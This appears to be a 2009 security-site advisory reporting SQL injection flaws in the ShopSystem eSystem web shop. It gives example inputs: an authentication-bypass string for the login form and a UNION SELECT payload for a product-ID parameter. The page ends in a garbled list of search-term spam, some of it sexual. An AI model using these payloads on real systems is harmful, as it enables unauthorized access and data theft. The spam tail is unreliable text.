about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ShopSystem eSystem Multiple SQL Injection Vulnerabilities


Title ShopSystem eSystem Multiple SQL Injection Vulnerabilities
Published 2009-01-26-12:00AM
Updated 2009-01-28-08:19PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cyb3r-1sT
Vulnerable  ShopSystem eSystem 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example input and URIs are available:http://www.example.com/logon.asp
user : Gaza ' or ' Gaza=Victory--
pass : Gaza ' or ' Gaza=Victory--http://www.example.com/Pop.asp?pro_id=[sql]
http://www.example.com/addtobasket.asp?pro_id=[sql]
http://www.example.com/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 06 Dec 2009 11:22:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
iixekipery mambo Remo 200 /compo iixekipery p...com%25 KHALE mambo+Remo php-nuke+2 WWW.cguu.n jobs Ea fifa 20 Sneka openssh 3. Red tube v news for c www.89.cgm ibs Woman boob Julia pere boonex.htm Tampilkan, indain hot mambo Remo CMS is Fre sexmaniak www.tamiks public_inc Julia ann /search/ex mambo Remo free seex www.myunit Web Server search/exp Anarkali/i ssh 3.8 www.shesex DSA Joomla Com www.xinxia VIDEO SE mambo Remo kspersky 6 www.nenla. prakash ke www.123+cl news+for+c VIDEO SE Jmatm /search/ex